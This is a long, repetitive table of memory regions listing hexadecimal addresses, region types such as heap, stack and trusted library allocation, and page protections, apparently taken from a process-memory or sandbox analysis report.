page read and write
|
||
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
1E449F36000
|
trusted library allocation
|
page read and write
|
||
21F12EAD000
|
trusted library allocation
|
page read and write
|
||
7FF848DF3000
|
trusted library allocation
|
page read and write
|
||
21F0F68F000
|
heap
|
page read and write
|
||
21F2A44C000
|
heap
|
page read and write
|
||
51FE000
|
stack
|
page read and write
|
||
2898B36B000
|
trusted library allocation
|
page read and write
|
||
1D292110000
|
heap
|
page read and write
|
||
1E449F21000
|
trusted library allocation
|
page read and write
|
||
1ADB50F1000
|
trusted library allocation
|
page read and write
|
||
21F12C2B000
|
trusted library allocation
|
page read and write
|
||
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
1E448125000
|
heap
|
page read and write
|
||
21F2B6FA000
|
heap
|
page read and write
|
||
1E462724000
|
heap
|
page read and write
|
||
20D735D0000
|
heap
|
page read and write
|
||
1E449E5E000
|
trusted library allocation
|
page read and write
|
||
F47000
|
heap
|
page read and write
|
||
1E44A326000
|
trusted library allocation
|
page read and write
|
||
209477FB000
|
heap
|
page read and write
|
||
511E000
|
stack
|
page read and write
|
||
21F12DEB000
|
trusted library allocation
|
page read and write
|
||
1E449F63000
|
trusted library allocation
|
page read and write
|
||
23AE000
|
stack
|
page read and write
|
||
2898B290000
|
heap
|
page execute and read and write
|
||
1B2B146F000
|
trusted library allocation
|
page read and write
|
||
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
19234B51000
|
trusted library allocation
|
page read and write
|
||
21F2A566000
|
heap
|
page read and write
|
||
217C514000
|
stack
|
page read and write
|
||
1B2B17CF000
|
trusted library allocation
|
page read and write
|
||
5720000
|
trusted library allocation
|
page read and write
|
||
7778BFE000
|
stack
|
page read and write
|
||
21F0F7A0000
|
trusted library allocation
|
page read and write
|
||
194599C1000
|
trusted library allocation
|
page read and write
|
||
21F29BB1000
|
heap
|
page read and write
|
||
1E462774000
|
heap
|
page read and write
|
||
1E45A59C000
|
trusted library allocation
|
page read and write
|
||
20D73570000
|
heap
|
page read and write
|
||
21F2A0B7000
|
heap
|
page read and write
|
||
21F12D27000
|
trusted library allocation
|
page read and write
|
||
1ADB5417000
|
trusted library allocation
|
page read and write
|
||
21F29F58000
|
heap
|
page read and write
|
||
21F12F05000
|
trusted library allocation
|
page read and write
|
||
1ADB5431000
|
trusted library allocation
|
page read and write
|
||
21F12E4F000
|
trusted library allocation
|
page read and write
|
||
1B2B14B5000
|
trusted library allocation
|
page read and write
|
||
7FF848E34000
|
trusted library allocation
|
page read and write
|
||
21F12CBF000
|
trusted library allocation
|
page read and write
|
||
21F0F7F3000
|
trusted library allocation
|
page read and write
|
||
77786FD000
|
stack
|
page read and write
|
||
21F12D5F000
|
trusted library allocation
|
page read and write
|
||
1E459DFD000
|
trusted library allocation
|
page read and write
|
||
21F11C76000
|
trusted library allocation
|
page read and write
|
||
19233210000
|
heap
|
page read and write
|
||
83EB9FE000
|
stack
|
page read and write
|
||
7FF848E04000
|
trusted library allocation
|
page read and write
|
||
21F2AA5E000
|
heap
|
page read and write
|
||
81F9CFF000
|
unkown
|
page read and write
|
||
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
21F29F20000
|
heap
|
page read and write
|
||
21F2AE89000
|
heap
|
page read and write
|
||
21F12EB3000
|
trusted library allocation
|
page read and write
|
||
21F12DC5000
|
trusted library allocation
|
page read and write
|
||
2898B39D000
|
trusted library allocation
|
page read and write
|
||
1E45A46E000
|
trusted library allocation
|
page read and write
|
||
1E449EAE000
|
trusted library allocation
|
page read and write
|
||
1390000
|
heap
|
page read and write
|
||
21F2BC48000
|
heap
|
page read and write
|
||
9AF398E000
|
stack
|
page read and write
|
||
21F2C058000
|
heap
|
page read and write
|
||
192330C0000
|
heap
|
page read and write
|
||
21F2A978000
|
heap
|
page read and write
|
||
A3EFCFF000
|
stack
|
page read and write
|
||
1E45AF07000
|
trusted library allocation
|
page read and write
|
||
7FF848DF4000
|
trusted library allocation
|
page read and write
|
||
21F2A548000
|
heap
|
page read and write
|
||
1B2B14BD000
|
trusted library allocation
|
page read and write
|
||
AFF000
|
stack
|
page read and write
|
||
23F67D75000
|
heap
|
page read and write
|
||
21F12D91000
|
trusted library allocation
|
page read and write
|
||
21F12E9D000
|
trusted library allocation
|
page read and write
|
||
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
21F12EA7000
|
trusted library allocation
|
page read and write
|
||
A3F03FA000
|
stack
|
page read and write
|
||
21F2208A000
|
trusted library allocation
|
page read and write
|
||
1ADB53E1000
|
trusted library allocation
|
page read and write
|
||
1ADB50DF000
|
trusted library allocation
|
page read and write
|
||
1B2B17DD000
|
trusted library allocation
|
page read and write
|
||
2310E1F0000
|
heap
|
page read and write
|
||
289899E0000
|
heap
|
page read and write
|
||
1E44A16C000
|
trusted library allocation
|
page read and write
|
||
4D6194C000
|
stack
|
page read and write
|
||
21F12D47000
|
trusted library allocation
|
page read and write
|
||
1B2B169F000
|
trusted library allocation
|
page read and write
|
||
29974E55000
|
heap
|
page read and write
|
||
21F2BFD0000
|
heap
|
page read and write
|
||
19234EDF000
|
trusted library allocation
|
page read and write
|
||
289897CD000
|
heap
|
page read and write
|
||
7FF848E3D000
|
trusted library allocation
|
page execute and read and write
|
||
1E45B47F000
|
trusted library allocation
|
page read and write
|
||
5290000
|
heap
|
page execute and read and write
|
||
7FF848E01000
|
trusted library allocation
|
page read and write
|
||
1B2B169D000
|
trusted library allocation
|
page read and write
|
||
21F12C65000
|
trusted library allocation
|
page read and write
|
||
21F12C3B000
|
trusted library allocation
|
page read and write
|
||
9BF000
|
stack
|
page read and write
|
||
1E449EBB000
|
trusted library allocation
|
page read and write
|
||
1E45AE87000
|
trusted library allocation
|
page read and write
|
||
1E4481D7000
|
heap
|
page read and write
|
||
19457D40000
|
heap
|
page read and write
|
||
1E45AD91000
|
trusted library allocation
|
page read and write
|
||
19457DCA000
|
heap
|
page read and write
|
||
156E000
|
heap
|
page read and write
|
||
1E45A45B000
|
trusted library allocation
|
page read and write
|
||
1830EC6B000
|
heap
|
page read and write
|
||
1E4629D4000
|
heap
|
page read and write
|
||
1E449D41000
|
trusted library allocation
|
page read and write
|
||
1ADB50DB000
|
trusted library allocation
|
page read and write
|
||
21F12C79000
|
trusted library allocation
|
page read and write
|
||
1E449B40000
|
trusted library allocation
|
page read and write
|
||
21F12E17000
|
trusted library allocation
|
page read and write
|
||
21F0F620000
|
heap
|
page read and write
|
||
2898B6BD000
|
trusted library allocation
|
page read and write
|
||
21F12D61000
|
trusted library allocation
|
page read and write
|
||
1E45A4FD000
|
trusted library allocation
|
page read and write
|
||
21F2A105000
|
heap
|
page read and write
|
||
5726F3C000
|
stack
|
page read and write
|
||
1E45A4E4000
|
trusted library allocation
|
page read and write
|
||
21F0F68D000
|
heap
|
page read and write
|
||
21F12DE7000
|
trusted library allocation
|
page read and write
|
||
2898B3A7000
|
trusted library allocation
|
page read and write
|
||
1E44A1DA000
|
trusted library allocation
|
page read and write
|
||
28989710000
|
heap
|
page read and write
|
||
21F2AE09000
|
heap
|
page read and write
|
||
1B2B16AB000
|
trusted library allocation
|
page read and write
|
||
1E45A453000
|
trusted library allocation
|
page read and write
|
||
28D84F20000
|
heap
|
page read and write
|
||
1B2AF959000
|
heap
|
page read and write
|
||
2898B58F000
|
trusted library allocation
|
page read and write
|
||
1D135C10000
|
heap
|
page read and write
|
||
21F2191C000
|
trusted library allocation
|
page read and write
|
||
21F2B618000
|
heap
|
page read and write
|
||
21F12ECF000
|
trusted library allocation
|
page read and write
|
||
2898B367000
|
trusted library allocation
|
page read and write
|
||
1E459E0F000
|
trusted library allocation
|
page read and write
|
||
21F12E9B000
|
trusted library allocation
|
page read and write
|
||
1B2B14B9000
|
trusted library allocation
|
page read and write
|
||
21F12C59000
|
trusted library allocation
|
page read and write
|
||
1B2AF7C0000
|
heap
|
page read and write
|
||
1B2B173B000
|
trusted library allocation
|
page read and write
|
||
21F0F7D5000
|
heap
|
page read and write
|
||
21F2BC8B000
|
heap
|
page read and write
|
||
21F12CEB000
|
trusted library allocation
|
page read and write
|
||
2898B3AD000
|
trusted library allocation
|
page read and write
|
||
20681306000
|
heap
|
page read and write
|
||
1E44A087000
|
trusted library allocation
|
page read and write
|
||
1B2B14C5000
|
trusted library allocation
|
page read and write
|
||
1E459DF7000
|
trusted library allocation
|
page read and write
|
||
1830EBE0000
|
heap
|
page read and write
|
||
2898B701000
|
trusted library allocation
|
page read and write
|
||
20D736E0000
|
trusted library allocation
|
page read and write
|
||
57AE000
|
stack
|
page read and write
|
||
1830EC84000
|
heap
|
page read and write
|
||
21F0F760000
|
heap
|
page read and write
|
||
21F12EAB000
|
trusted library allocation
|
page read and write
|
||
14FE000
|
heap
|
page read and write
|
||
21F12CB1000
|
trusted library allocation
|
page read and write
|
||
19234EE9000
|
trusted library allocation
|
page read and write
|
||
21F12D3D000
|
trusted library allocation
|
page read and write
|
||
1E459D6A000
|
trusted library allocation
|
page read and write
|
||
21F12E83000
|
trusted library allocation
|
page read and write
|
||
23F67D5E000
|
heap
|
page read and write
|
||
21F2BEF8000
|
heap
|
page read and write
|
||
1E45B671000
|
trusted library allocation
|
page read and write
|
||
1E459D41000
|
trusted library allocation
|
page read and write
|
||
1E39F2D4000
|
heap
|
page read and write
|
||
83EB2FF000
|
stack
|
page read and write
|
||
21F12E3F000
|
trusted library allocation
|
page read and write
|
||
113F000
|
stack
|
page read and write
|
||
1E45B3FB000
|
trusted library allocation
|
page read and write
|
||
2CA1000
|
trusted library allocation
|
page read and write
|
||
1E449DB2000
|
trusted library allocation
|
page read and write
|
||
21F12F03000
|
trusted library allocation
|
page read and write
|
||
1E45B4D3000
|
trusted library allocation
|
page read and write
|
||
21F12D55000
|
trusted library allocation
|
page read and write
|
||
21F22052000
|
trusted library allocation
|
page read and write
|
||
21F12E51000
|
trusted library allocation
|
page read and write
|
||
289898B0000
|
trusted library allocation
|
page read and write
|
||
7FF848F10000
|
trusted library allocation
|
page execute and read and write
|
||
23F67D9B000
|
heap
|
page read and write
|
||
21F2BED6000
|
heap
|
page read and write
|
||
2898B330000
|
heap
|
page read and write
|
||
361ACFA000
|
stack
|
page read and write
|
||
D85000
|
heap
|
page read and write
|
||
2EC000
|
stack
|
page read and write
|
||
1ADB5081000
|
trusted library allocation
|
page read and write
|
||
32BA000
|
trusted library allocation
|
page read and write
|
||
21F12D53000
|
trusted library allocation
|
page read and write
|
||
1B2AF915000
|
heap
|
page read and write
|
||
85C0BDC000
|
stack
|
page read and write
|
||
21F12D09000
|
trusted library allocation
|
page read and write
|
||
21F2B1DE000
|
heap
|
page read and write
|
||
1D292115000
|
heap
|
page read and write
|
||
29974E80000
|
heap
|
page read and write
|
||
1ADB50C9000
|
trusted library allocation
|
page read and write
|
||
1E459E0A000
|
trusted library allocation
|
page read and write
|
||
1E448355000
|
heap
|
page read and write
|
||
1ADB50D3000
|
trusted library allocation
|
page read and write
|
||
1E44A0F4000
|
trusted library allocation
|
page read and write
|
||
361A9FE000
|
stack
|
page read and write
|
||
1E45B4BE000
|
trusted library allocation
|
page read and write
|
||
206812E7000
|
heap
|
page read and write
|
||
361B0FE000
|
stack
|
page read and write
|
||
CF9000
|
stack
|
page read and write
|
||
5760000
|
trusted library allocation
|
page read and write
|
||
20D7368C000
|
heap
|
page read and write
|
||
21F22090000
|
trusted library allocation
|
page read and write
|
||
21F12D13000
|
trusted library allocation
|
page read and write
|
||
19244B51000
|
trusted library allocation
|
page read and write
|
||
19233080000
|
heap
|
page read and write
|
||
21F2A1A7000
|
heap
|
page read and write
|
||
6C3000
|
heap
|
page read and write
|
||
21F11276000
|
trusted library allocation
|
page read and write
|
||
19232EEC000
|
heap
|
page read and write
|
||
1B2B14AB000
|
trusted library allocation
|
page read and write
|
||
1E448128000
|
heap
|
page read and write
|
||
2898B5AB000
|
trusted library allocation
|
page read and write
|
||
1E45A5C7000
|
trusted library allocation
|
page read and write
|
||
22E4000
|
trusted library allocation
|
page read and write
|
||
21F12C3D000
|
trusted library allocation
|
page read and write
|
||
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
3060000
|
trusted library allocation
|
page read and write
|
||
1E4625B3000
|
heap
|
page read and write
|
||
21F12E2D000
|
trusted library allocation
|
page read and write
|
||
21F2B14B000
|
heap
|
page read and write
|
||
7FF848EAC000
|
trusted library allocation
|
page execute and read and write
|
||
21F12E33000
|
trusted library allocation
|
page read and write
|
||
21F12EC1000
|
trusted library allocation
|
page read and write
|
||
19234ECD000
|
trusted library allocation
|
page read and write
|
||
19233130000
|
trusted library allocation
|
page read and write
|
||
1E45B445000
|
trusted library allocation
|
page read and write
|
||
21F12C7B000
|
trusted library allocation
|
page read and write
|
||
1ADB53FF000
|
trusted library allocation
|
page read and write
|
||
7FF848DF4000
|
trusted library allocation
|
page read and write
|
||
2898B6B7000
|
trusted library allocation
|
page read and write
|
||
21F2B692000
|
heap
|
page read and write
|
||
21F219ED000
|
trusted library allocation
|
page read and write
|
||
21F12DA3000
|
trusted library allocation
|
page read and write
|
||
21F2BE70000
|
heap
|
page read and write
|
||
2898B6B1000
|
trusted library allocation
|
page read and write
|
||
21F12C7F000
|
trusted library allocation
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
85C0EFF000
|
stack
|
page read and write
|
||
21F29F52000
|
heap
|
page read and write
|
||
77787FF000
|
stack
|
page read and write
|
||
1B2B16FB000
|
trusted library allocation
|
page read and write
|
||
1E45B5D1000
|
trusted library allocation
|
page read and write
|
||
1B2AF9D2000
|
heap
|
page read and write
|
||
1E45B47C000
|
trusted library allocation
|
page read and write
|
||
2898B369000
|
trusted library allocation
|
page read and write
|
||
19234EC7000
|
trusted library allocation
|
page read and write
|
||
1E448350000
|
heap
|
page read and write
|
||
21F12CCD000
|
trusted library allocation
|
page read and write
|
||
1E462990000
|
heap
|
page read and write
|
||
1E45B463000
|
trusted library allocation
|
page read and write
|
||
23F68040000
|
heap
|
page read and write
|
||
21F2A4B6000
|
heap
|
page read and write
|
||
21F2AE00000
|
heap
|
page read and write
|
||
7FF848F30000
|
trusted library allocation
|
page execute and read and write
|
||
250000
|
unkown
|
page readonly
|
||
1ADB53E7000
|
trusted library allocation
|
page read and write
|
||
5BDD000
|
stack
|
page read and write
|
||
28989859000
|
heap
|
page read and write
|
||
21F12C75000
|
trusted library allocation
|
page read and write
|
||
21F2BA77000
|
heap
|
page read and write
|
||
21F12C31000
|
trusted library allocation
|
page read and write
|
||
1E44A308000
|
trusted library allocation
|
page read and write
|
||
1E45A465000
|
trusted library allocation
|
page read and write
|
||
2898B3BD000
|
trusted library allocation
|
page read and write
|
||
1E45A69C000
|
trusted library allocation
|
page read and write
|
||
7FF848E6C000
|
trusted library allocation
|
page execute and read and write
|
||
1830ECB1000
|
heap
|
page read and write
|
||
29974C8C000
|
heap
|
page read and write
|
||
1B2B16A9000
|
trusted library allocation
|
page read and write
|
||
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
4D61C7F000
|
stack
|
page read and write
|
||
21F2BAB9000
|
heap
|
page read and write
|
||
19457C00000
|
heap
|
page read and write
|
||
4D619CF000
|
stack
|
page read and write
|
||
1E45B4CC000
|
trusted library allocation
|
page read and write
|
||
547C000
|
stack
|
page read and write
|
||
2898B6E1000
|
trusted library allocation
|
page read and write
|
||
1ADB53ED000
|
trusted library allocation
|
page read and write
|
||
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
1E45A43A000
|
trusted library allocation
|
page read and write
|
||
5A0E000
|
stack
|
page read and write
|
||
21F12E7F000
|
trusted library allocation
|
page read and write
|
||
21F2B284000
|
heap
|
page read and write
|
||
1E39F450000
|
trusted library allocation
|
page read and write
|
||
1E45ACB0000
|
trusted library allocation
|
page read and write
|
||
77789FF000
|
stack
|
page read and write
|
||
9DE000
|
unkown
|
page read and write
|
||
1ADB52DB000
|
trusted library allocation
|
page read and write
|
||
23F67F20000
|
heap
|
page read and write
|
||
1E45A010000
|
trusted library allocation
|
page read and write
|
||
FDC18FE000
|
unkown
|
page read and write
|
||
1E462771000
|
heap
|
page read and write
|
||
21F12E63000
|
trusted library allocation
|
page read and write
|
||
90EA99F000
|
stack
|
page read and write
|
||
21F29EE8000
|
heap
|
page read and write
|
||
FDC157C000
|
stack
|
page read and write
|
||
1E449ED9000
|
trusted library allocation
|
page read and write
|
||
7FF848E03000
|
trusted library allocation
|
page read and write
|
||
21F12E61000
|
trusted library allocation
|
page read and write
|
||
23F67F40000
|
heap
|
page read and write
|
||
A3F04FB000
|
stack
|
page read and write
|
||
7FF848ED6000
|
trusted library allocation
|
page execute and read and write
|
||
21F12DB3000
|
trusted library allocation
|
page read and write
|
||
21F12C49000
|
trusted library allocation
|
page read and write
|
||
FDC19FF000
|
stack
|
page read and write
|
||
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
83D000
|
stack
|
page read and write
|
||
1830EC9B000
|
heap
|
page read and write
|
||
21F2B356000
|
heap
|
page read and write
|
||
7FF848ED6000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
29974CA1000
|
heap
|
page read and write
|
||
7FF848FB9000
|
trusted library allocation
|
page read and write
|
||
1ADB353B000
|
heap
|
page read and write
|
||
D40000
|
trusted library allocation
|
page read and write
|
||
2898B3AB000
|
trusted library allocation
|
page read and write
|
||
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
75B207F000
|
stack
|
page read and write
|
||
21F12D0D000
|
trusted library allocation
|
page read and write
|
||
9AF3EFE000
|
stack
|
page read and write
|
||
6FDA16E000
|
stack
|
page read and write
|
||
361B5FD000
|
stack
|
page read and write
|
||
1C8FA58A000
|
heap
|
page read and write
|
||
1D291E6A000
|
heap
|
page read and write
|
||
21F12CE7000
|
trusted library allocation
|
page read and write
|
||
289A3D70000
|
heap
|
page execute and read and write
|
||
1E4629A0000
|
heap
|
page read and write
|
||
1E449E74000
|
trusted library allocation
|
page read and write
|
||
21F12EA9000
|
trusted library allocation
|
page read and write
|
||
3E9000
|
stack
|
page read and write
|
||
1E45B457000
|
trusted library allocation
|
page read and write
|
||
1830ECB0000
|
heap
|
page read and write
|
||
2898B594000
|
trusted library allocation
|
page read and write
|
||
BB065FE000
|
unkown
|
page read and write
|
||
1ADCD800000
|
heap
|
page read and write
|
||
206814D0000
|
heap
|
page read and write
|
||
1B2B14AD000
|
trusted library allocation
|
page read and write
|
||
20947821000
|
heap
|
page read and write
|
||
289897CB000
|
heap
|
page read and write
|
||
2310E110000
|
heap
|
page read and write
|
||
21F2B7A0000
|
heap
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
7FF848ED6000
|
trusted library allocation
|
page execute and read and write
|
||
1E45B433000
|
trusted library allocation
|
page read and write
|
||
1B2B149D000
|
trusted library allocation
|
page read and write
|
||
217C525000
|
stack
|
page read and write
|
||
1E45A418000
|
trusted library allocation
|
page read and write
|
||
1E39F2D4000
|
heap
|
page read and write
|
||
1ADB3603000
|
heap
|
page read and write
|
||
31543FF000
|
stack
|
page read and write
|
||
4E7E000
|
stack
|
page read and write
|
||
83EB6FC000
|
stack
|
page read and write
|
||
1B2AF957000
|
heap
|
page read and write
|
||
19457E9E000
|
heap
|
page read and write
|
||
21F2B3D8000
|
heap
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
83EB3FE000
|
stack
|
page read and write
|
||
1E45A483000
|
trusted library allocation
|
page read and write
|
||
1C8FA8A0000
|
heap
|
page read and write
|
||
1E45B591000
|
trusted library allocation
|
page read and write
|
||
5C1F000
|
stack
|
page read and write
|
||
361A2ED000
|
stack
|
page read and write
|
||
21F111D0000
|
heap
|
page execute and read and write
|
||
21F12EDB000
|
trusted library allocation
|
page read and write
|
||
FD8E2DC000
|
stack
|
page read and write
|
||
21F2BDFC000
|
heap
|
page read and write
|
||
21F12D1D000
|
trusted library allocation
|
page read and write
|
||
7A5000
|
heap
|
page read and write
|
||
21F12E0B000
|
trusted library allocation
|
page read and write
|
||
1B2B168A000
|
trusted library allocation
|
page read and write
|
||
1E45A666000
|
trusted library allocation
|
page read and write
|
||
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
21F12D49000
|
trusted library allocation
|
page read and write
|
||
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
C7D26FE000
|
unkown
|
page read and write
|
||
83EBAFE000
|
stack
|
page read and write
|
||
21F12E37000
|
trusted library allocation
|
page read and write
|
||
21F2AE95000
|
heap
|
page read and write
|
||
77782ED000
|
stack
|
page read and write
|
||
21F12C67000
|
trusted library allocation
|
page read and write
|
||
1E45A47B000
|
trusted library allocation
|
page read and write
|
||
1ADB52BF000
|
trusted library allocation
|
page read and write
|
||
FA4000
|
heap
|
page read and write
|
||
31544FE000
|
stack
|
page read and write
|
||
209477DB000
|
heap
|
page read and write
|
||
21F12E97000
|
trusted library allocation
|
page read and write
|
||
23F67D50000
|
heap
|
page read and write
|
||
1E45B67C000
|
trusted library allocation
|
page read and write
|
||
1ADB5321000
|
trusted library allocation
|
page read and write
|
||
1E45A5B1000
|
trusted library allocation
|
page read and write
|
||
306B000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
1E45A5D1000
|
trusted library allocation
|
page read and write
|
||
21F12E91000
|
trusted library allocation
|
page read and write
|
||
21F12CB7000
|
trusted library allocation
|
page read and write
|
||
21F2A8F4000
|
heap
|
page read and write
|
||
21F2AF0B000
|
heap
|
page read and write
|
||
19244B5F000
|
trusted library allocation
|
page read and write
|
||
21F219E3000
|
trusted library allocation
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
3619FBE000
|
stack
|
page read and write
|
||
2B9F000
|
stack
|
page read and write
|
||
1ADB5427000
|
trusted library allocation
|
page read and write
|
||
1E45B4DD000
|
trusted library allocation
|
page read and write
|
||
1E45A4EC000
|
trusted library allocation
|
page read and write
|
||
A3F01FE000
|
stack
|
page read and write
|
||
2C9F000
|
stack
|
page read and write
|
||
32AA000
|
trusted library allocation
|
page read and write
|
||
21F12D29000
|
trusted library allocation
|
page read and write
|
||
1D291E68000
|
heap
|
page read and write
|
||
158B000
|
heap
|
page read and write
|
||
1E45A504000
|
trusted library allocation
|
page read and write
|
||
7FF848E23000
|
trusted library allocation
|
page read and write
|
||
28D85030000
|
heap
|
page read and write
|
||
6EE000
|
heap
|
page read and write
|
||
21F12C77000
|
trusted library allocation
|
page read and write
|
||
7FF848F9B000
|
trusted library allocation
|
page read and write
|
||
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
21F12C57000
|
trusted library allocation
|
page read and write
|
||
21F2A474000
|
heap
|
page read and write
|
||
21F12CB3000
|
trusted library allocation
|
page read and write
|
||
21F12CE5000
|
trusted library allocation
|
page read and write
|
||
21F12E6D000
|
trusted library allocation
|
page read and write
|
||
21F111E1000
|
trusted library allocation
|
page read and write
|
||
21F12E4D000
|
trusted library allocation
|
page read and write
|
||
4D70000
|
heap
|
page read and write
|
||
16AA000
|
trusted library allocation
|
page execute and read and write
|
||
A3F05FE000
|
stack
|
page read and write
|
||
21F12DD1000
|
trusted library allocation
|
page read and write
|
||
31549FA000
|
stack
|
page read and write
|
||
7FF848F99000
|
trusted library allocation
|
page read and write
|
||
21F12C87000
|
trusted library allocation
|
page read and write
|
||
AD56EFF000
|
stack
|
page read and write
|
||
21F0F945000
|
heap
|
page read and write
|
||
1B2B1441000
|
trusted library allocation
|
page read and write
|
||
19233215000
|
heap
|
page read and write
|
||
1E449B60000
|
heap
|
page execute and read and write
|
||
7FF4C70D0000
|
trusted library allocation
|
page execute and read and write
|
||
57273FF000
|
stack
|
page read and write
|
||
2898B6DB000
|
trusted library allocation
|
page read and write
|
||
1B2C9CE0000
|
heap
|
page read and write
|
||
29974C91000
|
heap
|
page read and write
|
||
6F8000
|
heap
|
page read and write
|
||
1ADB5097000
|
trusted library allocation
|
page read and write
|
||
2068130A000
|
heap
|
page read and write
|
||
21F29DFC000
|
heap
|
page read and write
|
||
28989790000
|
heap
|
page read and write
|
||
2899B341000
|
trusted library allocation
|
page read and write
|
||
21F12DEF000
|
trusted library allocation
|
page read and write
|
||
21F111E8000
|
trusted library allocation
|
page read and write
|
||
1E4624B0000
|
heap
|
page execute and read and write
|
||
7FF848DF3000
|
trusted library allocation
|
page execute and read and write
|
||
206814E0000
|
heap
|
page read and write
|
||
1E39F291000
|
heap
|
page read and write
|
||
2898B696000
|
trusted library allocation
|
page read and write
|
||
194699C1000
|
trusted library allocation
|
page read and write
|
||
21F12D21000
|
trusted library allocation
|
page read and write
|
||
4FBE000
|
stack
|
page read and write
|
||
21F12CA7000
|
trusted library allocation
|
page read and write
|
||
21F12C37000
|
trusted library allocation
|
page read and write
|
||
21F12E07000
|
trusted library allocation
|
page read and write
|
||
1E449B76000
|
heap
|
page read and write
|
||
21F12C3F000
|
trusted library allocation
|
page read and write
|
||
1ADB5411000
|
trusted library allocation
|
page read and write
|
||
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
1ADB50CF000
|
trusted library allocation
|
page read and write
|
||
23F67D78000
|
heap
|
page read and write
|
||
1E449F23000
|
trusted library allocation
|
page read and write
|
||
1E4482E0000
|
heap
|
page read and write
|
||
21F12C47000
|
trusted library allocation
|
page read and write
|
||
6FDA175000
|
stack
|
page read and write
|
||
21F12D03000
|
trusted library allocation
|
page read and write
|
||
1E45B3F9000
|
trusted library allocation
|
page read and write
|
||
310E000
|
stack
|
page read and write
|
||
7FF848DFD000
|
trusted library allocation
|
page execute and read and write
|
||
1E45A691000
|
trusted library allocation
|
page read and write
|
||
1830EC86000
|
heap
|
page read and write
|
||
29974D50000
|
heap
|
page read and write
|
||
D64000
|
trusted library allocation
|
page read and write
|
||
1E45B476000
|
trusted library allocation
|
page read and write
|
||
21F21983000
|
trusted library allocation
|
page read and write
|
||
BBF000
|
stack
|
page read and write
|
||
21F12D81000
|
trusted library allocation
|
page read and write
|
||
1E449DEB000
|
trusted library allocation
|
page read and write
|
||
21F29B0B000
|
heap
|
page read and write
|
||
21F2B2C6000
|
heap
|
page read and write
|
||
361BAF9000
|
stack
|
page read and write
|
||
21F12D25000
|
trusted library allocation
|
page read and write
|
||
F77000
|
heap
|
page read and write
|
||
1E459DDB000
|
trusted library allocation
|
page read and write
|
||
236E000
|
stack
|
page read and write
|
||
7FF848EB0000
|
trusted library allocation
|
page execute and read and write
|
||
22B16210000
|
heap
|
page read and write
|
||
192333D0000
|
heap
|
page read and write
|
||
2898B34F000
|
trusted library allocation
|
page read and write
|
||
19457DAC000
|
heap
|
page read and write
|
||
83EAF8E000
|
stack
|
page read and write
|
||
19459D3D000
|
trusted library allocation
|
page read and write
|
||
1E459D5D000
|
trusted library allocation
|
page read and write
|
||
21F12D71000
|
trusted library allocation
|
page read and write
|
||
1E4628FC000
|
heap
|
page read and write
|
||
5740000
|
trusted library allocation
|
page read and write
|
||
209477F4000
|
heap
|
page read and write
|
||
21F1126B000
|
trusted library allocation
|
page read and write
|
||
90EA91F000
|
stack
|
page read and write
|
||
21F0F530000
|
heap
|
page read and write
|
||
21F2A012000
|
heap
|
page read and write
|
||
21F2A9DA000
|
heap
|
page read and write
|
||
1B2B16A3000
|
trusted library allocation
|
page read and write
|
||
1B2B17B1000
|
trusted library allocation
|
page read and write
|
||
F68000
|
heap
|
page read and write
|
||
21F2A705000
|
heap
|
page read and write
|
||
23F67DAC000
|
heap
|
page read and write
|
||
19233153000
|
trusted library allocation
|
page read and write
|
||
3154AF5000
|
stack
|
page read and write
|
||
7FF848E4C000
|
trusted library allocation
|
page execute and read and write
|
||
77783FF000
|
stack
|
page read and write
|
||
53DE000
|
stack
|
page read and write
|
||
21F12D5D000
|
trusted library allocation
|
page read and write
|
||
2D00000
|
heap
|
page read and write
|
||
21F29F9A000
|
heap
|
page read and write
|
||
1ADC5071000
|
trusted library allocation
|
page read and write
|
||
19457F90000
|
heap
|
page read and write
|
||
1E45A48E000
|
trusted library allocation
|
page read and write
|
||
20947760000
|
heap
|
page read and write
|
||
83EB5FE000
|
stack
|
page read and write
|
||
1B2AFA63000
|
trusted library allocation
|
page read and write
|
||
21F29B33000
|
heap
|
page read and write
|
||
1E45B667000
|
trusted library allocation
|
page read and write
|
||
1E45A4D7000
|
trusted library allocation
|
page read and write
|
||
94C000
|
stack
|
page read and write
|
||
1B2AF8F0000
|
heap
|
page read and write
|
||
21F12E5D000
|
trusted library allocation
|
page read and write
|
||
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
3154CFE000
|
stack
|
page read and write
|
||
23B0000
|
trusted library allocation
|
page execute and read and write
|
||
2068131B000
|
heap
|
page read and write
|
||
1E45AE47000
|
trusted library allocation
|
page read and write
|
||
361A8FF000
|
stack
|
page read and write
|
||
1E45B5A7000
|
trusted library allocation
|
page read and write
|
||
A3F0AFE000
|
stack
|
page read and write
|
||
19457E0E000
|
heap
|
page read and write
|
||
4A20000
|
trusted library allocation
|
page read and write
|
||
21F12EEB000
|
trusted library allocation
|
page read and write
|
||
21F0F740000
|
heap
|
page read and write
|
||
2898986A000
|
heap
|
page read and write
|
||
21F12DAD000
|
trusted library allocation
|
page read and write
|
||
7FF848E13000
|
trusted library allocation
|
page execute and read and write
|
||
361A4FC000
|
stack
|
page read and write
|
||
21F12D5B000
|
trusted library allocation
|
page read and write
|
||
21F12D45000
|
trusted library allocation
|
page read and write
|
||
194599B0000
|
heap
|
page execute and read and write
|
||
83EBBFE000
|
stack
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
21F12DFF000
|
trusted library allocation
|
